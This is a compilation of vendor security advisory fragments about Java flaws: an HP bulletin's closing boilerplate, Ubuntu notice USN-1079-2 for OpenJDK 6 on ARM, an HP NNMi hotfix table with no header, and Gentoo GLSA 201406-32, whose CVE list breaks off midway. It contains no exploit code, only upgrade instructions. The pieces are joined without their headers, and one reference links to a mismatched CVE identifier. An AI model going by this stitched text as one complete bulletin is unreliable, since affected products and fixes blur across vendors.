It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
Copyright 2011 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iEYEARECAAYFAk1sQl4ACgkQ4B86/C0qfVkZoACg+A0Nrllhsgj+ZNVRWBJtSGg0
+McAoLe5aV6VZ16dYIp6IG59vPG8unq8
=sL4p
-----END PGP SIGNATURE-----
. ===========================================================
Ubuntu Security Notice USN-1079-2 March 15, 2011
openjdk-6b18 vulnerabilities
CVE-2010-4448, CVE-2010-4450, CVE-2010-4465, CVE-2010-4469,
CVE-2010-4470, CVE-2010-4471, CVE-2010-4472, CVE-2010-4476,
CVE-2011-0706
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 9.10
Ubuntu 10.04 LTS
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 9.10:
icedtea6-plugin 6b18-1.8.7-0ubuntu1~9.10.1
openjdk-6-jre 6b18-1.8.7-0ubuntu1~9.10.1
openjdk-6-jre-headless 6b18-1.8.7-0ubuntu1~9.10.1
Ubuntu 10.04 LTS:
icedtea6-plugin 6b18-1.8.7-0ubuntu1~10.04.2
openjdk-6-jre 6b18-1.8.7-0ubuntu1~10.04.2
openjdk-6-jre-headless 6b18-1.8.7-0ubuntu1~10.04.2
After a standard system update you need to restart any Java services,
applications or applets to make all the necessary changes.
Details follow:
USN-1079-1 fixed vulnerabilities in OpenJDK 6 for non-armel (ARM)
architectures. This update provides the corresponding updates for
OpenJDK 6 for use with the armel (ARM) architectures.
In order to build the armel (ARM) OpenJDK 6 update for Ubuntu 10.04
LTS, it was necessary to rebuild binutils and gcj-4.4 from Ubuntu
10.04 LTS updates.
Original advisory details:
It was discovered that untrusted Java applets could create domain
name resolution cache entries, allowing an attacker to manipulate
name resolution within the JVM. (CVE-2010-4448)
It was discovered that the Java launcher did not did not properly
setup the LD_LIBRARY_PATH environment variable. A local attacker
could exploit this to execute arbitrary code as the user invoking
the program. (CVE-2010-4450)
It was discovered that within the Swing library, forged timer events
could allow bypass of SecurityManager checks. This could allow an
attacker to access restricted resources. (CVE-2010-4465)
It was discovered that certain bytecode combinations confused memory
management within the HotSpot JVM. This could allow an attacker to
cause a denial of service through an application crash or possibly
inject code. (CVE-2010-4469)
It was discovered that the way JAXP components were handled
allowed them to be manipulated by untrusted applets. An attacker
could use this to bypass XML processing restrictions and elevate
privileges. (CVE-2010-4470)
It was discovered that the Java2D subcomponent, when processing broken
CFF fonts could leak system properties. (CVE-2010-4471)
It was discovered that a flaw in the XML Digital Signature
component could allow an attacker to cause untrusted code to
replace the XML Digital Signature Transform or C14N algorithm
implementations. (CVE-2010-4472)
Konstantin Prei\xdfer and others discovered that specific double literals
were improperly handled, allowing a remote attacker to cause a denial
of service. (CVE-2011-0706)
Updated packages for Ubuntu 9.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7-0ubuntu1~9.10.1.diff.gz
Size/MD5: 146232 31c9fd1c87f901507dec909a87d40589
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7-0ubuntu1~9.10.1.dsc
Size/MD5: 3009 13ad66a10ac1cb3698ec20d1d214a626
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7.orig.tar.gz
Size/MD5: 71430490 b2811b2e53cd9abaad6959d33fe10d19
armel architecture (ARM Architecture):
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/icedtea-6-jre-cacao_6b18-1.8.7-0ubuntu1~9.10.1_armel.deb
Size/MD5: 369758 6c4489efb438728ec430f7fe9c560a24
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/icedtea6-plugin_6b18-1.8.7-0ubuntu1~9.10.1_armel.deb
Size/MD5: 75714 7d6bcfe18707892e7aebe836cff565db
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-dbg_6b18-1.8.7-0ubuntu1~9.10.1_armel.deb
Size/MD5: 84965722 3bd57de4c9b80d33e545cd1e9c9492e9
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-demo_6b18-1.8.7-0ubuntu1~9.10.1_armel.deb
Size/MD5: 1544602 d3689556c3354209f1ac402f2ebde500
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jdk_6b18-1.8.7-0ubuntu1~9.10.1_armel.deb
Size/MD5: 9107834 c31913d1c41bc826021784ea9c99cfb5
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jre-headless_6b18-1.8.7-0ubuntu1~9.10.1_armel.deb
Size/MD5: 29720800 eff015c81953c6d7384706d14d97a896
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jre_6b18-1.8.7-0ubuntu1~9.10.1_armel.deb
Size/MD5: 255212 d01547c3c8ea7991c8417718e0d9031b
http://ports.ubuntu.com/pool/universe/o/openjdk-6b18/openjdk-6-jre-zero_6b18-1.8.7-0ubuntu1~9.10.1_armel.deb
Size/MD5: 4853678 3da0193b13769aff3f13c3946ac145a5
Updated packages for Ubuntu 10.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7-0ubuntu1~10.04.2.diff.gz
Size/MD5: 146294 ed4b09749d16004b52b0488c8191eb3f
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7-0ubuntu1~10.04.2.dsc
Size/MD5: 3062 5edaf7e9dbd70b79868927f2debafc6c
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7.orig.tar.gz
Size/MD5: 71430490 b2811b2e53cd9abaad6959d33fe10d19
armel architecture (ARM Architecture):
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/icedtea-6-jre-cacao_6b18-1.8.7-0ubuntu1~10.04.2_armel.deb
Size/MD5: 346450 a68c38540eabb97715893feecb295fb0
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/icedtea6-plugin_6b18-1.8.7-0ubuntu1~10.04.2_armel.deb
Size/MD5: 73856 8afdfac50e3431dbc7330f8b84ecf37b
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-dbg_6b18-1.8.7-0ubuntu1~10.04.2_armel.deb
Size/MD5: 41237528 13b2864e53bea1395ec4ee19a724fc98
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-demo_6b18-1.8.7-0ubuntu1~10.04.2_armel.deb
Size/MD5: 1525192 cf0e7f1013fa1f88134d288246dfa078
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jdk_6b18-1.8.7-0ubuntu1~10.04.2_armel.deb
Size/MD5: 9101442 a22e6ec0af97c5b2a2dc2dc71650a863
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jre-headless_6b18-1.8.7-0ubuntu1~10.04.2_armel.deb
Size/MD5: 29512754 7e8283f159bbbad2ea5939c78db8bd6a
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jre_6b18-1.8.7-0ubuntu1~10.04.2_armel.deb
Size/MD5: 245384 1ea80079241fe9ce65c39f6768ab842b
. Customers should open a support case to request the
following hotfixes.
NNMi Version / Operating System
Required Patch
Hotfix
9.1x HP-UX
Patch 4
Hotfix-NNMi-9.1xP4-HP-UX-JDK-20120710.zip
9.1x Linux
Patch 4
Hotfix-NNMi-9.1xP4-Linux-JDK-20120523.zip
9.1x Solaris
Patch 4
Hotfix-NNMi-9.1xP4-Solaris-JDK-20120523.zip
9.1x Windows
Patch 4
Hotfix-NNMi-9.1xP4-Windows-JDK-20120523.zip
Note: The hotfix must be installed after the required patch. The hotfix must
be reinstalled if the required patch is reinstalled.
MANUAL ACTIONS: Yes - Update
Install the applicable patch and hotfix. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201406-32
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: IcedTea JDK: Multiple vulnerabilities
Date: June 29, 2014
Bugs: #312297, #330205, #340819, #346799, #352035, #353418,
#354231, #355127, #370787, #387637, #404095, #421031,
#429522, #433389, #438750, #442478, #457206, #458410,
#461714, #466822, #477210, #489570, #508270
ID: 201406-32
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in the IcedTea JDK, the worst
of which could lead to arbitrary code execution.
Background
==========
IcedTea is a distribution of the Java OpenJDK source code built with
free build tools.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/icedtea-bin < 6.1.13.3 >= 6.1.13.3
Description
===========
Multiple vulnerabilities have been discovered in the IcedTea JDK.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All IcedTea JDK users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-java/icedtea-bin-6.1.13.3"
References
==========
[ 1 ] CVE-2009-3555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555
[ 2 ] CVE-2010-2548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2548
[ 3 ] CVE-2010-2783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2783
[ 4 ] CVE-2010-3541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3541
[ 5 ] CVE-2010-3548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3548
[ 6 ] CVE-2010-3549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3549
[ 7 ] CVE-2010-3551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3551
[ 8 ] CVE-2010-3553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3553
[ 9 ] CVE-2010-3554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3554
[ 10 ] CVE-2010-3557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3557
[ 11 ] CVE-2010-3561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3561
[ 12 ] CVE-2010-3562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3562
[ 13 ] CVE-2010-3564
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3564
[ 14 ] CVE-2010-3565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3565
[ 15 ] CVE-2010-3566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3566
[ 16 ] CVE-2010-3567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3567
[ 17 ] CVE-2010-3568
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3568
[ 18 ] CVE-2010-3569
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3569
[ 19 ] CVE-2010-3573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3573
[ 20 ] CVE-2010-3574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3574
[ 21 ] CVE-2010-3860
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3860
[ 22 ] CVE-2010-4351
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4351
[ 23 ] CVE-2010-4448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4448
[ 24 ] CVE-2010-4450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4450
[ 25 ] CVE-2010-4465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4465
[ 26 ] CVE-2010-4467
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4467
[ 27 ] CVE-2010-4469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4469
[ 28 ] CVE-2010-4470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4470
[ 29 ] CVE-2010-4471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4471
[ 30 ] CVE-2010-4472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4472
[ 31 ] CVE-2010-4476
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4476
[ 32 ] CVE-2011-0025
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0025
[ 33 ] CVE-2011-0706
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0706
[ 34 ] CVE-2011-0815
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0815
[ 35 ] CVE-2011-0822
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0822
[ 36 ] CVE-2011-0862
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0862
[ 37 ] CVE-2011-0864
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0864
[ 38 ] CVE-2011-0865
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0865
[ 39 ] CVE-2011-0868
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0868
[ 40 ] CVE-2011-0869
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0869
[ 41 ] CVE-2011-0870
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0870
[ 42 ] CVE-2011-0871
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0871
[ 43 ] CVE-2011-0872
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0872
[ 44 ] CVE-2011-3389
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389
[ 45 ] CVE-2011-3521
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3521
[ 46 ] CVE-2011-3544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3544
[ 47 ] CVE-2011-3547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3547
[ 48 ] CVE-2011-3548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3548
[ 49 ] CVE-2011-3551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3551
[ 50 ] CVE-2011-3552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3552
[ 51 ] CVE-2011-3553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3553
[ 52 ] CVE-2011-3554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3554
[ 53 ] CVE-2011-3556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3556
[ 54 ] CVE-2011-3557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3557
[ 55 ] CVE-2011-3558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3558
[ 56 ] CVE-2011-3560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3560
[ 57 ] CVE-2011-3563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563
[ 58 ] CVE-2011-3571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3571
[ 59 ] CVE-2011-5035
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035
[ 60 ] CVE-2012-0497
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497
[ 61 ] CVE-2012-0501
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501
[ 62 ] CVE-2012-0502
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502
[ 63 ] CVE-2012-0503
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503
[ 64 ] CVE-2012-0505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505
[ 65 ] CVE-2012-0506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506
[ 66 ] CVE-2012-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547
[ 67 ] CVE-2012-1711
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711
[ 68 ] CVE-2012-1713
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713
[ 69 ] CVE-2012-1716
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716
[ 70 ] CVE-2012-1717
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717
[ 71 ] CVE-2012-1718
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718
[ 72 ] CVE-2012-1719
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719
[ 73 ] CVE-2012-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723
[ 74 ] CVE-2012-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724
[ 75 ] CVE-2012-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725
[ 76 ] CVE-2012-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726
[ 77 ] CVE-2012-3216
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216
[ 78 ] CVE-2012-3422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3422
[ 79 ] CVE-2012-3423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3423
[ 80 ] CVE-2012-4416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416
[ 81 ] CVE-2012-4540
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4540
[ 82 ] CVE-2012-5068
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068
[ 83 ] CVE-2012-5069
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069
[ 84 ] CVE-2012-5070
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070
[ 85 ] CVE-2012-5071
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071
[ 86 ] CVE-2012-5072
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072
[ 87 ] CVE-2012-5073
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073
[ 88 ] CVE-2012-5074
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074
[ 89 ] CVE-2012-5075
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075
[ 90 ] CVE-2012-5076
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076
[ 91 ] CVE-2012-5077
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077
[ 92 ] CVE-2012-5081
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081
[ 93 ] CVE-2012-5084
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084
[ 94 ] CVE-2012-5085
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085
[ 95 ] CVE-2012-5086
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086
[ 96 ] CVE-2012-5087
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087
[ 97 ] CVE-2012-5089
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089
[ 98 ] CVE-2012-5979
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5979
[ 99 ] CVE-2013-0169
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169
[ 100 ] CVE-2013-0401
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401
[ 101 ] CVE-2013-0424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0424
[ 102 ] CVE-2013-0425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0425
[ 103 ] CVE-2013-0426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0426
[ 104 ] CVE-2013-0427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0427
[ 105 ] CVE-2013-0428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0428
[ 106 ] CVE-2013-0429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0429
[ 107 ] CVE-2013-0431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0431
[ 108 ] CVE-2013-0432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0432
[ 109 ] CVE-2013-0433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0433
[ 110 ] CVE-2013-0434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0434
[ 111 ] CVE-2013-0435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0435
[ 112 ] CVE-2013-0440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0440
[ 113 ] CVE-2013-0441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0441
[ 114 ] CVE-2013-0442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0442
[ 115 ] CVE-2013-0443
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0443
[ 116 ] CVE-2013-0444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0444
[ 117 ] CVE-2013-0450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0450
[ 118 ] CVE-2013-0809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809
[ 119 ] CVE-2013-1475
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1475
[ 120 ] CVE-2013-1476
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1476
[ 121 ] CVE-2013-1478
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1478
[ 122 ] CVE-2013-1480
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1480
[ 123 ] CVE-2013-1484
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484
[ 124 ] CVE-2013-1485
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485
[ 125 ] CVE-2013-1486
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486
[ 126 ] CVE-2013-1488
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488
[ 127 ] CVE-2013-1493
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493
[ 128 ] CVE-2013-1500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500
[ 129 ] CVE-2013-1518
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518
[ 130 ] CVE-2013-1537
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537
[ 131 ] CVE-2013-1557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557
[ 132 ] CVE-2013-1569
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569
[ 133 ] CVE-2013-1571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571
[ 134 ] CVE-2013-2383
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383
[ 135 ] CVE-2013-2384
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384
[ 136 ] CVE-2013-2407
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407
[ 137 ] CVE-2013-2412
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412
[ 138 ] CVE-2013-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415
[ 139 ] CVE-2013-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417
[ 140 ] CVE-2013-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419
[ 141 ] CVE-2013-2420
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420
[ 142 ] CVE-2013-2421
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421
[ 143 ] CVE-2013-2422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422
[ 144 ] CVE-2013-2423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423
[ 145 ] CVE-2013-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424
[ 146 ] CVE-2013-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426
[ 147 ] CVE-2013-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429
[ 148 ] CVE-2013-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430
[ 149 ] CVE-2013-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431
[ 150 ] CVE-2013-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436
[ 151 ] CVE-2013-2443
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443
[ 152 ] CVE-2013-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444
[ 153 ] CVE-2013-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445
[ 154 ] CVE-2013-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446
[ 155 ] CVE-2013-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447
[ 156 ] CVE-2013-2448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448
[ 157 ] CVE-2013-2449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449
[ 158 ] CVE-2013-2450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450
[ 159 ] CVE-2013-2451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451
[ 160 ] CVE-2013-2452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452
[ 161 ] CVE-2013-2453
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453
[ 162 ] CVE-2013-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454
[ 163 ] CVE-2013-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455
[ 164 ] CVE-2013-2456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456
[ 165 ] CVE-2013-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457
[ 166 ] CVE-2013-2458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458
[ 167 ] CVE-2013-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459
[ 168 ] CVE-2013-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460
[ 169 ] CVE-2013-2461
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461
[ 170 ] CVE-2013-2463
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463
[ 171 ] CVE-2013-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465
[ 172 ] CVE-2013-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469
[ 173 ] CVE-2013-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470
[ 174 ] CVE-2013-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471
[ 175 ] CVE-2013-2472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472
[ 176 ] CVE-2013-2473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473
[ 177 ] CVE-2013-3829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829
[ 178 ] CVE-2013-4002
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4002
[ 179 ] CVE-2013-5772
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772
[ 180 ] CVE-2013-5774
